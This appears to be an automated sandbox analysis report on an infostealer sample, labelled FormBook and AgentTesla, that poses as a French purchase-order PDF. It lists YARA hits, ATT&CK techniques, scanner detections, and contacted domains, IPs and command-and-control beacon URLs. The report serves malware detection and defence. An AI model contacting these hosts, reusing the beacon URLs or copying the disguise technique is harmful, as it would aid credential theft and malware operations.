Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection512	Masquerading1	OS Credential Dumping	Security Software Discovery121	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection512	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information5	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing3	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Nouveau bon de commande. 3007021_pdf.exe	61%	Virustotal		Browse
Nouveau bon de commande. 3007021_pdf.exe	43%	Metadefender		Browse
Nouveau bon de commande. 3007021_pdf.exe	82%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
Nouveau bon de commande. 3007021_pdf.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
trucktodock.com	3%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cnN	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.trucktodock.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=3clrjbd8Uk1yhLkd6I01KEeFnSa+FczhmxXwmvBnovucnEmM2e32CtS7ZjKvb0koSvtC	0%	Avira URL Cloud	safe
http://www.theassistedadrscheme.com/ajs8/?3fBlVXm=PXCQsRsj6f+UKLkz5iYmBV65DPKHBBScBAKRyWuZQRoQL6ffVXDgpay6Ct5U2sE+s5q9&q48d=HFQLptYpKX	0%	Avira URL Cloud	safe
http://travelawardsguide.com/ajs8/?3fBlVXm=SVfnn/RS59BZjQOJq1nGaV1j1LxsdmH7K5f9UuJUxaq5YOiipJWffLZbL	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
https://www.indiadesignstory.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=LEjUMU	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.handybusy.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=2BRIB0J+IU74eT9QrM34IgOLc6rvRxRggRQ5Dm44nGBTXrZyhrhiT7zmyDkAgt3Lv1f/	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
www.trucktodock.com/ajs8/	0%	Avira URL Cloud	safe
http://www.indiadesignstory.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=LEjUMU+rw+m1MGLci6xLa4kNPPdUPj6aoKRsjeM/sCEy0PaNWwzv7jP2E4a8Zzb0ARTh	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.shopvybz.com/ajs8/?3fBlVXm=hqPLwoezIU4RJkzOayN9OUqrFULw7U9SfOZePsq8F9HyGJJZCf9ZB5ZbUnjAkpqHeNor&q48d=HFQLptYpKX	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.discountpty.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=xNYePOcIRg8tONHl062QEzR3pjdpSOb6qFMYs+u8dcNvqsBFMqM/aahx6CIdT83MIu1q	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
theassistedadrscheme.com	34.102.136.180	true	false		unknown
trucktodock.com	34.102.136.180	true	false	3%, Virustotal, Browse	unknown
www.travelawardsguide.com	217.160.0.64	true	false		unknown
indiadesignstory.com	160.153.138.219	true	true		unknown
handybusy.com	162.241.218.97	true	true		unknown
server.domainsconfig.ru	193.142.59.163	true	false		unknown
shops.myshopify.com	23.227.38.74	true	true		unknown
www.comericac.com	unknown	unknown	true		unknown
www.jual-penggugurkandungan.com	unknown	unknown	true		unknown
www.discountpty.com	unknown	unknown	true		unknown
www.mybluemonitor.com	unknown	unknown	true		unknown
www.handybusy.com	unknown	unknown	true		unknown
www.n1getaccess.com	unknown	unknown	true		unknown
www.trucktodock.com	unknown	unknown	true		unknown
www.theassistedadrscheme.com	unknown	unknown	true		unknown
www.signin-solution.com	unknown	unknown	true		unknown
www.shopvybz.com	unknown	unknown	true		unknown
www.indiadesignstory.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.trucktodock.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=3clrjbd8Uk1yhLkd6I01KEeFnSa+FczhmxXwmvBnovucnEmM2e32CtS7ZjKvb0koSvtC	false	Avira URL Cloud: safe	unknown
http://www.theassistedadrscheme.com/ajs8/?3fBlVXm=PXCQsRsj6f+UKLkz5iYmBV65DPKHBBScBAKRyWuZQRoQL6ffVXDgpay6Ct5U2sE+s5q9&q48d=HFQLptYpKX	false	Avira URL Cloud: safe	unknown
http://www.handybusy.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=2BRIB0J+IU74eT9QrM34IgOLc6rvRxRggRQ5Dm44nGBTXrZyhrhiT7zmyDkAgt3Lv1f/	true	Avira URL Cloud: safe	unknown
www.trucktodock.com/ajs8/	true	Avira URL Cloud: safe	low
http://www.indiadesignstory.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=LEjUMU+rw+m1MGLci6xLa4kNPPdUPj6aoKRsjeM/sCEy0PaNWwzv7jP2E4a8Zzb0ARTh	true	Avira URL Cloud: safe	unknown
http://www.shopvybz.com/ajs8/?3fBlVXm=hqPLwoezIU4RJkzOayN9OUqrFULw7U9SfOZePsq8F9HyGJJZCf9ZB5ZbUnjAkpqHeNor&q48d=HFQLptYpKX	true	Avira URL Cloud: safe	unknown
http://www.discountpty.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=xNYePOcIRg8tONHl062QEzR3pjdpSOb6qFMYs+u8dcNvqsBFMqM/aahx6CIdT83MIu1q	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.founder.com.cn/cnN	Nouveau bon de commande. 3007021_pdf.exe, 00000000.00000003.206509028.0000000000FAD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false		high
http://travelawardsguide.com/ajs8/?3fBlVXm=SVfnn/RS59BZjQOJq1nGaV1j1LxsdmH7K5f9UuJUxaq5YOiipJWffLZbL	WWAHost.exe, 0000000A.00000002.477885883.0000000003D32000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
